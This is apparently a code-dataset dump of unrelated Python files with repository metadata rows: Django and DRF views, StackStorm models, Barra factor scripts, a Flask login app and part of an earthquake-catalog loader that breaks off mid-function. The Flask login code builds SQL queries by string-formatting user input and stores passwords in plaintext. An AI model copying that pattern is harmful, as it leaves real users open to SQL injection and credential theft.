return redirect('instagram:post_detail', pk=pk)
def comment_edit(request, pk, comment_pk):
comment = get_object_or_404(Comment, pk=comment_pk)
form = CommentForm(request.POST or None,
instance=comment)
if request.method == 'POST':
if form.is_valid():
comment_form = form.save(commit=False)
comment_form.comment = request.POST.get("comment")
comment_form.save()
return redirect('instagram:post_detail', pk=pk)
# 함수기반
# @login_required
# def post_delete(request, pk):
# model = Post
# post = get_object_or_404(model, pk=pk)
# if post.author == request.user:
# messages.warning(request, '정말 삭제 하시겠습니까?')
# if request.method == 'POST':
# post.delete()
# messages.success(request, '포스팅 삭제 완료')
# return redirect('instagram:post_list')
# else:
# messages.warning(request, '작성한 회원만 삭제할 수 있습니다')
# return redirect(post)
# return render(request, 'instagram/post_delete.html', {
# })
post_create = PostCreateView.as_view()
post_update = PostUpdateView.as_view()
post_list = PostListView.as_view()
post_delete = PostDeleteView.as_view()
#######################################
from rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet
from .serializers import PostSerializer
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import generics
from rest_framework.generics import RetrieveAPIView
from rest_framework.decorators import api_view, action
from rest_framework.permissions import IsAuthenticated
from .permissions import IsAuthorOrReadonly
class PostViewSet(ModelViewSet):
queryset = Post.objects.all()
serializer_class = PostSerializer
permission_classes = [IsAuthenticated, IsAuthorOrReadonly]
filter_backends = [SearchFilter, OrderingFilter]
search_fields=['message']
ordering=['id']
@action(detail=False, methods=['GET'])
def message(self, request):
qs = self.get_queryset().filter(message__startswith='1')
serializer = self.get_serializer(qs, many=True)
return Response(serializer.data)
@action(detail=True, methods=['PATCH'])
def message_set(self, request, pk):
instance = self.get_object()
instance.message = '바뀜'
instance.save(update_fields=['message'])
serializer = self.get_serializer(instance)
return Response(serializer.data)
# class PostAPIView(generics.ListAPIView):
# queryset = Post.objects.all()
# serializer_class = PostSerializer
#
#
# class PostListAPIView(APIView):
# def get(self, request):
# qs = Post.objects.all()
# serializer = PostSerializer(qs, many=True)
# return Response(serializer.data)
#
# @api_view(['GET'])
# def post_api_view2(request):
# qs = Post.objects.all()
# serializer = PostSerializer(qs, many=True)
# return Response(serializer.data)
class PostDetailAPIView(RetrieveAPIView):
queryset = Post.objects.all()
renderer_classes = [TemplateHTMLRenderer]
template_name='instagram/mypost.html'
def get(self, request, *args, **kwargs):
post = self.get_object()
return Response({
'post': PostSerializer(post).data
}) | [
"skarndrkd1222@gmail.com"
] | skarndrkd1222@gmail.com |
63c7e6fe54ba6dae4f1797752b42b55890887057 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02409/s766823066.py | 34c864d987f1742566592d17da40546e50f9c4f4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | n = int(input())
list = [[[0 for i in range(10)] for j in range(3)] for k in range(4)]
for i in range(n):
a,b,c,d = [int(j) for j in input().split()]
list[a-1][b-1][c-1] += d
for i in range(4):
for j in range(3):
for k in range(10):
print(" {0}".format(list[i][j][k]),end='')
print()
if i != 3:
print("####################") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
6e33e1d8b5d3c083c46e467a888d86fe4a21f45d | cc2fcc1a0c5ea9789f98ec97614d7b25b03ba101 | /st2common/st2common/models/db/execution.py | dcc363b0feb7a0410be85b1d1b8636dc23afc808 | [
"Apache-2.0"
] | permissive | Junsheng-Wu/st2 | 6451808da7de84798641882ca202c3d1688f8ba8 | c3cdf657f7008095f3c68b4132b9fe76d2f52d81 | refs/heads/master | 2022-04-30T21:32:44.039258 | 2020-03-03T07:03:57 | 2020-03-03T07:03:57 | 244,301,363 | 0 | 0 | Apache-2.0 | 2022-03-29T22:04:26 | 2020-03-02T06:53:58 | Python | UTF-8 | Python | false | false | 7,432 | py | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import mongoengine as me
from st2common import log as logging
from st2common.models.db import stormbase
from st2common.fields import ComplexDateTimeField
from st2common.util import date as date_utils
from st2common.util.secrets import get_secret_parameters
from st2common.util.secrets import mask_inquiry_response
from st2common.util.secrets import mask_secret_parameters
from st2common.constants.types import ResourceType
__all__ = [
'ActionExecutionDB',
'ActionExecutionOutputDB'
]
LOG = logging.getLogger(__name__)
class ActionExecutionDB(stormbase.StormFoundationDB):
RESOURCE_TYPE = ResourceType.EXECUTION
UID_FIELDS = ['id']
trigger = stormbase.EscapedDictField()
trigger_type = stormbase.EscapedDictField()
trigger_instance = stormbase.EscapedDictField()
rule = stormbase.EscapedDictField()
action = stormbase.EscapedDictField(required=True)
runner = stormbase.EscapedDictField(required=True)
# Only the diff between the liveaction type and what is replicated
# in the ActionExecutionDB object.
liveaction = stormbase.EscapedDictField(required=True)
status = me.StringField(
required=True,
help_text='The current status of the liveaction.')
start_timestamp = ComplexDateTimeField(
default=date_utils.get_datetime_utc_now,
help_text='The timestamp when the liveaction was created.')
end_timestamp = ComplexDateTimeField(
help_text='The timestamp when the liveaction has finished.')
parameters = stormbase.EscapedDynamicField(
default={},
help_text='The key-value pairs passed as to the action runner & action.')
result = stormbase.EscapedDynamicField(
default={},
help_text='Action defined result.')
context = me.DictField(
default={},
help_text='Contextual information on the action execution.')
parent = me.StringField()
children = me.ListField(field=me.StringField())
log = me.ListField(field=me.DictField())
# Do not use URLField for web_url. If host doesn't have FQDN set, URLField validation blows.
web_url = me.StringField(required=False)
meta = {
'indexes': [
{'fields': ['rule.ref']},
{'fields': ['action.ref']},
{'fields': ['liveaction.id']},
{'fields': ['start_timestamp']},
{'fields': ['end_timestamp']},
{'fields': ['status']},
{'fields': ['parent']},
{'fields': ['rule.name']},
{'fields': ['runner.name']},
{'fields': ['trigger.name']},
{'fields': ['trigger_type.name']},
{'fields': ['trigger_instance.id']},
{'fields': ['context.user']},
{'fields': ['-start_timestamp', 'action.ref', 'status']}
]
}
def get_uid(self):
# TODO Construct od from non id field:
uid = [self.RESOURCE_TYPE, str(self.id)]
return ':'.join(uid)
def mask_secrets(self, value):
result = copy.deepcopy(value)
liveaction = result['liveaction']
parameters = {}
# pylint: disable=no-member
parameters.update(value.get('action', {}).get('parameters', {}))
parameters.update(value.get('runner', {}).get('runner_parameters', {}))
secret_parameters = get_secret_parameters(parameters=parameters)
result['parameters'] = mask_secret_parameters(parameters=result['parameters'],
secret_parameters=secret_parameters)
if 'parameters' in liveaction:
liveaction['parameters'] = mask_secret_parameters(parameters=liveaction['parameters'],
secret_parameters=secret_parameters)
if liveaction.get('action', '') == 'st2.inquiry.respond':
# Special case to mask parameters for `st2.inquiry.respond` action
# In this case, this execution is just a plain python action, not
# an inquiry, so we don't natively have a handle on the response
# schema.
#
# To prevent leakage, we can just mask all response fields.
result['parameters']['response'] = mask_secret_parameters(
parameters=liveaction['parameters']['response'],
secret_parameters=[p for p in liveaction['parameters']['response']]
)
# TODO(mierdin): This logic should be moved to the dedicated Inquiry
# data model once it exists.
if self.runner.get('name') == "inquirer":
schema = result['result'].get('schema', {})
response = result['result'].get('response', {})
# We can only mask response secrets if response and schema exist and are
# not empty
if response and schema:
result['result']['response'] = mask_inquiry_response(response, schema)
return result
def get_masked_parameters(self):
"""
Retrieve parameters with the secrets masked.
:rtype: ``dict``
"""
serializable_dict = self.to_serializable_dict(mask_secrets=True)
return serializable_dict['parameters']
class ActionExecutionOutputDB(stormbase.StormFoundationDB):
"""
Stores output of a particular execution.
New document is inserted dynamically when a new chunk / line is received which means you can
simulate tail behavior by periodically reading from this collection.
Attribute:
execution_id: ID of the execution to which this output belongs.
action_ref: Parent action reference.
runner_ref: Parent action runner reference.
timestamp: Timestamp when this output has been produced / received.
output_type: Type of the output (e.g. stdout, stderr, output)
data: Actual output data. This could either be line, chunk or similar, depending on the
runner.
"""
execution_id = me.StringField(required=True)
action_ref = me.StringField(required=True)
runner_ref = me.StringField(required=True)
timestamp = ComplexDateTimeField(required=True, default=date_utils.get_datetime_utc_now)
output_type = me.StringField(required=True, default='output')
data = me.StringField()
meta = {
'indexes': [
{'fields': ['execution_id']},
{'fields': ['action_ref']},
{'fields': ['runner_ref']},
{'fields': ['timestamp']},
{'fields': ['output_type']}
]
}
MODELS = [ActionExecutionDB, ActionExecutionOutputDB]
| [
"wei.ying@easystack.cn"
] | wei.ying@easystack.cn |
423385b7603bb326c76dd43a32df2f7a1505d221 | 589b5eedb71d83c15d44fedf60c8075542324370 | /project/stock_project/barra_risk_model/barra_factor/cal_factor_barra_leverage.py | 17358e48ac842ad352fcf71dc23fe7800a3a6799 | [] | no_license | rlcjj/quant | 4c2be8a8686679ceb675660cb37fad554230e0d4 | c07e8f0f6e1580ae29c78c1998a53774a15a67e1 | refs/heads/master | 2020-03-31T07:15:48.111511 | 2018-08-27T05:29:00 | 2018-08-27T05:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,472 | py | def cal_factor_barra_leverage_market_leverage():
name = 'TotalLiabilityDaily'
total_debt = get_h5_data(name)
name = 'TotalAssetDaily'
total_asset = get_h5_data(name)
debt_to_asset = total_debt.div(total_asset)
debt_to_asset = debt_to_asset.dropna(how='all')
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\raw_data\\'
debt_to_asset.to_csv(out_path + 'RAW_CNE5_LEVERAGE_MARKET_LEVERAGE.csv')
debt_to_asset = remove_extreme_value_mad_pandas(debt_to_asset)
debt_to_asset = normal_pandas(debt_to_asset)
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\standardization_data\\'
debt_to_asset.to_csv(out_path + 'NORMAL_CNE5_LEVERAGE_MARKET_LEVERAGE.csv')
def cal_factor_barra_leverage():
name = 'NORMAL_CNE5_LEVERAGE_MARKET_LEVERAGE'
leverage = get_barra_standard_data(name)
leverage = leverage.dropna(how='all')
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\raw_data\\'
leverage.to_csv(out_path + 'RAW_CNE5_LEVERAGE.csv')
leverage = remove_extreme_value_mad_pandas(leverage)
leverage = normal_pandas(leverage)
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\standardization_data\\'
leverage.to_csv(out_path + 'NORMAL_CNE5_LEVERAGE.csv')
if __name__ == '__main__':
cal_factor_barra_leverage_market_leverage()
cal_factor_barra_leverage()
| [
"1119332482@qq.com"
] | 1119332482@qq.com |
dfffd665730509eb19be752fae578c6918d50252 | 002b18b4e66d7536ce8538f65edcb0cf17472bf7 | /liaoxuefeng/webframework/app2.py | 146d43b72ca6e0bd9c5785af52b29a650d58b0a1 | [] | no_license | yslatgit/test-ysl | 987b6026ddd74c88bb81b41ce12e43733c458cb1 | c1a8858a8ad346913131c3bd9fb8ae8ea84c36a7 | refs/heads/master | 2020-04-10T15:16:55.898370 | 2018-12-21T06:51:09 | 2018-12-21T06:51:09 | 161,104,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | from flask import Flask, request, render_template
import os, sqlite3
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def homeMeth():
return render_template('home.html')
@app.route('/login', methods=['POST'])
def loginMeth():
username = request.form['username']
password = request.form['password']
msg = dealInfo(username, password, 1)
if msg == True:
return render_template('login.html')
else:
return render_template('home.html', message = msg)
@app.route('/success', methods=['POST'])
def successMeth():
username = request.form['username']
password = request.form['password']
msg = dealInfo(username, password, 2)
if msg == True:
return render_template('success.html')
else:
return render_template('login.html', message = msg)
# type:1:保存 2:查询
def dealInfo(name, pwd, type):
msg = ""
print(name, pwd, type)
# 没有则建立数据库文件,有则建立连接
db_file = os.path.join(os.path.dirname(__file__), 'dbdb.db')
conn = sqlite3.connect(db_file)
cursor = conn.cursor()
# 获取该数据库下的所有表名
a = "select name from sqlite_master where type = 'table'"
cursor.execute(a)
tableNames = cursor.fetchall()
# 若无表,则新建表格'user'
if tableNames:
pass
else:
cursor.execute('create table user(username VARCHAR(20), password VARCHAR(20))')
# 判断用户名和密码是否为空
if name == '' or pwd == '':
return "用户名和密码不能为空"
# 查询该表格下是否有该条数据
cursor.execute("select * from user WHERE username = '%s'" %name)
values = cursor.fetchall()
if values:
for value in values:
if value[0] == name:
if type == 1:
cursor.close()
conn.close()
return "该用户名已存在,请重填注册信息。。。"
elif type == 2 and value[1] == pwd: # 信息一致,登录成功
cursor.close()
conn.close()
return True
msg = "密码错误,请重新输入"
else: # 没有查询到数据
if type == 1: # 信息保存成功,可以进行登录操作
cursor.execute("insert into user VALUES ('%s', '%s')" %(name, pwd))
cursor.close()
conn.commit()
conn.close()
return True
else:
msg = '没有此用户名信息,请核对。。。'
cursor.close()
conn.close()
return msg
if __name__ == '__main__':
app.run() | [
"986725816@qq.com"
] | 986725816@qq.com |
fe70e24316ee8a47560b7e331c0a5d8d453646d4 | 88849505c8d71c5fcc8d18fe2da3aa93a97f1e0e | /cupt/screen.py | 7e2100412973869b68b09de2b05d22f16142cf6c | [
"MIT"
] | permissive | mscroggs/KLBFAX | 5322e025c41b30c6f160699e742c988c9e47ea88 | 3aaaa0cfe3b9772caa0a87e639efd9bce5b6adf4 | refs/heads/master | 2021-04-09T16:38:08.581934 | 2018-06-25T12:18:23 | 2018-06-25T12:18:26 | 31,314,664 | 5 | 1 | null | 2017-07-26T19:21:13 | 2015-02-25T13:26:38 | Python | UTF-8 | Python | false | false | 830 | py | import curses
import config
from .cupt import CuPT
class Screen:
def __enter__(self):
import locale
locale.setlocale(locale.LC_ALL,"")
self.scr = curses.initscr()
self.cupt = CuPT(self.scr)
curses.start_color()
curses.use_default_colors()
curses.noecho()
curses.cbreak()
self.old = curses.curs_set(0)
self.scr.keypad(1)
curses.resizeterm(config.HEIGHT,config.WIDTH)
self.scr.refresh()
return self
def getch(self):
return self.scr.getch()
def __exit__(self,a,b,c):
curses.nocbreak()
curses.curs_set(self.old)
self.scr.keypad(0)
curses.echo()
curses.endwin()
class DummyScreen:
def __init__(self):
self.scr = None
self.cupt = CuPT(self.scr)
| [
"matthew.w.scroggs@gmail.com"
] | matthew.w.scroggs@gmail.com |
959ec00f00a0cf6fe78fac46268a67bebfb445ef | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03565/s875696871.py | 6fdbfc635ad33e71b8d47334616f309ffe409d41 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | s = input()
T = input()
n_s = len(s)
n_t = len(T)
S = ""
for i in range(n_s-n_t+1):
s_i = s[i:n_t+i]
flag = True
for j in range(n_t):
if s_i[j] != "?":
if s_i[j] != T[j]:
break
else:
S = s[:i] + T + s[n_t+i:]
#print(S)
if S == "":
print("UNRESTORABLE")
exit()
S = list(S)
for i in range(n_s):
if S[i] == "?":
S[i] = "a"
print("".join(S))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c05430eb373a57834315638dedc9649acbcc0526 | df5b1caed735947b3cf6f4cdf46f3141ba9e2c5c | /boot3.spec | f7516251ea56958c76f03542e6131ca2e7dbd8d7 | [] | no_license | hcferreira-git/RDM | 33b303469ca0230ac1a0a82e74ba5c4fbe894837 | e53972cab2d416bbf44bb9c874d8d91d82b7d074 | refs/heads/master | 2021-03-31T16:36:29.549303 | 2020-04-18T16:14:59 | 2020-04-18T16:14:59 | 248,119,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | spec | # -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['boot3.py'],
pathex=['C:\\Users\\Henrique\\Desktop\\bootzap'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='boot3',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=True )
| [
"="
] | = |
ff55eaec085d49b9f5eb03937b64b571bd46a4f2 | 5b593bc4d1c90ea85eb9912eeb3977269977b46b | /bin/django-admin | 7eff524b82cc60403d52b91169c8ddf082a7199c | [] | no_license | monetree/djangular | b17ef12bc08d33676fe0e7fc865e2ba5bc4cc36e | abd5b714ab1276061f3ee7f3685eb0f198b8326b | refs/heads/master | 2020-03-16T07:39:17.557622 | 2018-05-10T09:09:58 | 2018-05-10T09:09:58 | 132,580,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | #!/home/soubhagya/Desktop/django/angular/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
| [
"soubhagyakumar666@gmail.com"
] | soubhagyakumar666@gmail.com | |
f606a00512bc29ccfe2df949a965f936047364f3 | 49d8827695d1fa9076467fd1ec2e26afcf56e2dc | /mloc.py | 850abda4ff754f6d4bf76e3b5f6fb2b518135018 | [] | no_license | mhearne-usgs/comcatloader | 8eb8c2214915b13403b35f5b6a991ce9fb67090c | 35f00d33356f72484ffc5be1bdd7a9c2e7a3c090 | refs/heads/master | 2020-04-01T16:46:47.101082 | 2016-02-05T15:54:06 | 2016-02-05T15:54:06 | 9,404,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,860 | py | #!/usr/bin/env python
#stdlib imports
import sys
import os.path
from datetime import datetime,timedelta
import re
import socket
import string
import argparse
import textwrap
import math
from collections import OrderedDict
import urllib2
import json
#local imports
from neicio.tag import Tag
#host/port of the NEIC CWB metadata server queried by StationTranslator
CWBHOST = 'cwbpub.cr.usgs.gov'
CWBPORT = 2052
#minimum magnitude threshold (not referenced in this chunk -- presumably used
#by code elsewhere in the file; confirm before removing)
MINMAG = 4.0
#ComCat event-search URL template; the [BRACKETED] placeholders are filled in
#by getPrefMag()
URLBASE = 'http://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=[START]&endtime=[END]&latitude=[LAT]&longitude=[LON]&maxradiuskm=[RAD]'
RADIUS = 10 #km around an epicenter to search for matching earthquake
TIMEDELTA = 3 #seconds around an origin time to search for matching earthquake
#contributor/catalog code prepended to event ids (see createOriginTag)
SOURCE = 'rde'
TIMERROR = 5 #how many days can the phase time be from a given station epoch before we don't consider it to be part of that epoch
TIMEFMT = '%Y-%m-%dT%H:%M:%S' #ISO-8601 timestamp format used in ComCat queries
#phase usage flags from the MLOC phase records ('+'/'x'/'-'); 1 presumably
#means "used in the solution", 0 "unused" -- confirm against MLOC docs
USAGE = {'+':1,'x':0,'-':0}
#map MLOC one-letter depth codes to depth-determination method strings
#(presumably QuakeML origin depthType values -- confirm)
DEPTHTYPES = {'c':'operator assigned',
              'd':'constrained by depth phases',
              'e':'other',
              'f':'other',
              'l':'constrained by direct phases',
              'm':'from location',
              'n':'constrained by direct phases',
              'r':'from location',
              'u':'other',
              'w':'from moment tensor inversion'}
class StationTranslator(object):
    """Translate bare MLOC station codes into NSCL (net.sta.chan.loc) names.

    Station metadata is queried from the NEIC CWB server (CWBHOST:CWBPORT).
    Successful lookups are cached in ``stationdict`` under the key
    ``STATION-P`` (station code plus first letter of the phase name), and the
    cache can be saved to / loaded from a simple "key = value" text file so
    repeated runs avoid re-querying the server.
    """
    def __init__(self,dictionaryfile=None):
        """Create a translator, optionally pre-loading the lookup cache.

        :param dictionaryfile:
          Optional path to a file of "key = value" lines, as written by a
          previous call to save().
        """
        self.stationdict = {}
        if dictionaryfile is not None:
            with open(dictionaryfile,'rt') as f:
                for line in f.readlines():
                    key,value = line.split('=')
                    self.stationdict[key.strip()] = value.strip()

    def save(self,dictfile):
        """Write the station cache to dictfile, one "key = value" per line."""
        with open(dictfile,'wt') as f:
            for key,value in self.stationdict.items():
                f.write('%s = %s\n' % (key.strip(),value.strip()))

    def callCWBServer(self,req):
        """Send one fixed-width request to the CWB server; return raw text.

        Reads until the '<EOR>' end-of-response marker arrives.  On failure a
        single retry is attempted after a short pause; if that also fails,
        whatever was received (possibly an empty string) is returned, since
        callers treat the response as best-effort.
        """
        response = ''
        for attempt in range(2):
            response = ''
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM,0)
                s.connect((CWBHOST,CWBPORT))
                s.send(req)
                while True:
                    response += s.recv(10241)
                    if response.find('<EOR>') > -1:
                        break
                s.close()
                return response
            except Exception:
                if attempt == 0:
                    time.sleep(2) #give the server a moment before the retry
        return response

    def getStationEpoch(self,station,phasetime):
        """Return a representative time inside the station metadata epoch
        containing phasetime, or None if no epoch matches.

        Epochs are padded by TIMERROR days at both ends before the
        containment test.  The epoch midpoint is returned, except that a
        midpoint in the future (an open-ended epoch) is replaced by
        phasetime itself.
        """
        req = '-c c -s ..%s -b all \n' % station
        pad = chr(0) * (80 - len(req)) #server expects an 80-byte record
        req = str(req + pad)
        response = self.callCWBServer(req)
        epochs = []
        for line in response.split('\n'):
            parts = line.split()
            #epoch rows carry start date/time in fields 10-11 and end
            #date/time in fields 13-14; require all of them to exist (the
            #previous len < 9 test could raise IndexError on short rows)
            if len(parts) < 15:
                continue
            try:
                t1 = datetime.strptime(parts[10]+' '+parts[11]+':00','%Y-%m-%d %H:%M:%S')
                t2 = datetime.strptime(parts[13]+' '+parts[14]+':00','%Y-%m-%d %H:%M:%S')
            except ValueError:
                continue #row had enough fields but was not an epoch record
            epochs.append((t1,t2))
        slop = timedelta(seconds=86400*TIMERROR)
        for t1,t2 in epochs:
            if phasetime > t1 - slop and phasetime < t2 + slop:
                dt = t2 - t1
                nseconds = dt.days*86400 + dt.seconds
                etime = t1 + timedelta(seconds=nseconds//2)
                if etime > datetime.utcnow():
                    etime = phasetime
                return etime
        return None

    def getIR(self,station):
        """Return a 'NET.STA..' name from an ISC/IRIS alias record, or the
        input station code unchanged when no alias is found."""
        req = '-b all -a *.*.%s -c c \n' % station
        pad = chr(0) * (80 - len(req))
        req = str(req + pad)
        response = self.callCWBServer(req)
        for line in response.split('\n'):
            parts = line.split(':')
            if len(parts) < 2:
                continue
            pieces = parts[0].split('.')
            #alias keys look like 'source.net.sta.xxx'; skip anything else
            if len(pieces) != 4:
                continue
            alias_source,net,sta,_ = pieces
            if alias_source.lower() not in ['isc','iris']:
                continue
            return '%s.%s..' % (net,sta)
        return station

    def getFSDN(self,station):
        """Return a 'NET.STA..' name from an FDSN alias record, or the input
        station code unchanged when no alias is found."""
        req = '-c c -a FDSN.IR.%s -c c \n' % station
        pad = chr(0) * (80 - len(req))
        req = str(req + pad)
        response = self.callCWBServer(req)
        for line in response.split('\n'):
            parts = line.split(':')
            if len(parts) < 2:
                continue
            pieces = parts[0].split('.')
            #need at least 'x.net.sta' (the previous len < 2 test still
            #allowed an IndexError on pieces[2])
            if len(pieces) < 3:
                continue
            if pieces[2] != station:
                continue
            return '%s.%s..' % (pieces[1],pieces[2])
        return station

    def getNSCL(self,station,phasetype,phasetime):
        """Return the cached or newly looked-up NSCL name for station/phase.

        Lookup order: 1) the in-memory cache, 2) an FDSN alias,
        3) an ISC/IRIS alias.  If nothing matches, the bare station code is
        returned (callers use that as the "no mapping found" signal).  The
        result is cached under 'STATION-<first letter of phase name>'.
        """
        stationkey = station+'-'+phasetype[0:1]
        if stationkey in self.stationdict:
            return self.stationdict[stationkey]
        dt = timedelta(seconds=86400)
        preferred = station
        #find a date at which valid metadata exists for this station
        epoch = self.getStationEpoch(station,phasetime)
        if epoch is not None:
            timestr = (epoch+dt).strftime('%Y/%m/%d')
            okchannels = ['HH','BH','SH','HN']
            scode = '..%s' % (station)
            req = '-c c -s %s -b %s \n' % (scode,timestr)
            pad = chr(0) * (80 - len(req))
            req = str(req + pad)
            response = self.callCWBServer(req)
            #NOTE(review): both branches below empty the line list, so the
            #channel-selection loop that follows never executes and the
            #direct channel query above is effectively disabled.  Behavior is
            #preserved here -- confirm whether the disabling was intentional
            #before re-enabling the parsing.
            if response.find('no channels found to match') > -1:
                preferred = station
                lines = []
            else:
                lines = []
            nscl_list = []
            for line in lines:
                parts = line.split(':')
                if len(parts) < 2:
                    continue
                net,sta,loc,channel = parts[0].split()
                if sta.lower() != station.lower():
                    continue
                if channel[0:2] not in okchannels:
                    continue
                #P phases want vertical components, S phases horizontals
                if phasetype.lower().startswith('p') and not channel.lower().endswith('z'):
                    continue
                if phasetype.lower().startswith('s') and re.search('[1|2|E|N]$',channel) is None:
                    continue
                nscl_list.append('%s.%s.%s.%s' % (net,sta,channel,loc))
            #prefer HH, then BH, then SH, then HN channels
            for nscl in nscl_list:
                net,sta,channel,loc = nscl.split('.')
                if channel.lower().startswith(('hh','bh','sh','hn')):
                    preferred = nscl
                    break
        if preferred == station:
            preferred = self.getFSDN(station)
        if preferred == station:
            preferred = self.getIR(station)
        self.stationdict[stationkey] = preferred
        return preferred
def getPrefMag(event):
    """Query ComCat for the event matching this MLOC solution.

    Searches within RADIUS km and +/- TIMEDELTA seconds of the event's
    location and origin time.

    :param event:
      Event dict with at least 'lat', 'lon', 'time' and 'magnitude' keys.
    :returns:
      The matching ComCat event's preferred magnitude, or None when the web
      request fails or when zero or multiple candidate events are found.
    """
    url = URLBASE.replace('[RAD]','%i' % RADIUS)
    url = url.replace('[LAT]','%.4f' % event['lat'])
    url = url.replace('[LON]','%.4f' % event['lon'])
    stime = event['time'] - timedelta(seconds=TIMEDELTA)
    etime = event['time'] + timedelta(seconds=TIMEDELTA)
    url = url.replace('[START]','%s' % stime.strftime(TIMEFMT))
    url = url.replace('[END]','%s' % etime.strftime(TIMEFMT))
    try:
        fh = urllib2.urlopen(url)
        data = fh.read()
        fh.close()
    except Exception:
        #the previous code swallowed this error and then used the unbound
        #file handle anyway; treat a failed fetch as "no match" instead
        print('Could not retrieve %s' % url)
        return None
    jdict = json.loads(data)
    features = jdict.get('features', [])
    if len(features) != 1:
        #zero candidates, or an ambiguous match -- either way, no answer
        print('No event matching %s M%.1f' % (event['time'],event['magnitude'][0]['magnitude']))
        return None
    pevent = features[0]
    return pevent['properties']['mag']
def readLayerLine(event,line):
    """Parse a crustal-model layer record and append it to the event.

    :param event: Event dict being assembled (mutated in place).
    :param line:  Record whose payload (after the 1-char type code) is
                  'depth vp vs', three whitespace-separated floats.
    :returns: The event dict, with [depth, vp, vs] appended to
              event['layer'] (the list is created on first use).
    """
    depth,vp,vs = [float(p) for p in line[1:].strip().split()]
    event.setdefault('layer', []).append([depth,vp,vs])
    return event
def readStationLine(event,line):
    """Parse a station record and append it to the event.

    :param event: Event dict being assembled (mutated in place).
    :param line:  Record whose payload (after the 1-char type code) is
                  'station lat lon elev'.
    :returns: The event dict, with a {'id','lat','lon','elev'} dict appended
              to event['stations'] (the list is created on first use).
    """
    parts = line[1:].strip().split()
    station = parts[0]
    lat,lon,elev = [float(p) for p in parts[1:4]]
    event.setdefault('stations', []).append({'id':station,'lat':lat,'lon':lon,'elev':elev})
    return event
def readCommentLine(event,line):
    """Accumulate a comment record onto event['comment'].

    Each comment fragment is appended with a single leading space (the very
    first fragment also carries a leading space).  Returns the mutated event.
    """
    text = line[1:].strip()
    event['comment'] = event.get('comment', '') + ' ' + text
    return event
def readHypoLine(event,line):
    """Parse the hypocenter record into the event dict.

    Fills in origin time (with microseconds), time error, lat/lon (longitude
    normalized from 0-360 into -180..180), error-ellipse azimuth and axes,
    depth and its code/bounds, GT category, author and cluster id.
    Returns the mutated event.
    """
    fields = line[1:].strip().split()
    year, month, day, hour, minute = [int(v) for v in fields[0:5]]
    seconds = float(fields[5])
    event['timeerror'] = float(fields[6])
    micros = int((seconds - int(seconds))*1e6)
    whole = int(seconds) - 1 #input seconds run 1-60, not 0-59
    if whole == -1:
        whole = 0
    event['time'] = datetime(year, month, day, hour, minute, whole, micros)
    event['lat'] = float(fields[7])
    longitude = float(fields[8])
    if longitude > 180:
        longitude -= 360
    event['lon'] = longitude
    event['azimuth'] = int(fields[9])
    event['smajor'] = float(fields[10])
    event['sminor'] = float(fields[11])
    event['depth'] = float(fields[12])
    event['depthcode'] = fields[13]
    event['depthlower'] = float(fields[14])
    event['depthupper'] = float(fields[15])
    event['gtcu'] = fields[16]
    event['author'] = fields[17]
    event['clusterid'] = fields[18]
    return event
def readMagnitudeLine(event,line):
    """Parse a magnitude record and append it to the event.

    The payload (after the 1-char type code) is 'value scale author...';
    an 'UNK' scale is recorded as 'ML'.  Returns the mutated event with the
    magnitude dict appended to event['magnitude'] (list created on first use).
    """
    parts = line[1:].split()
    magscale = parts[1]
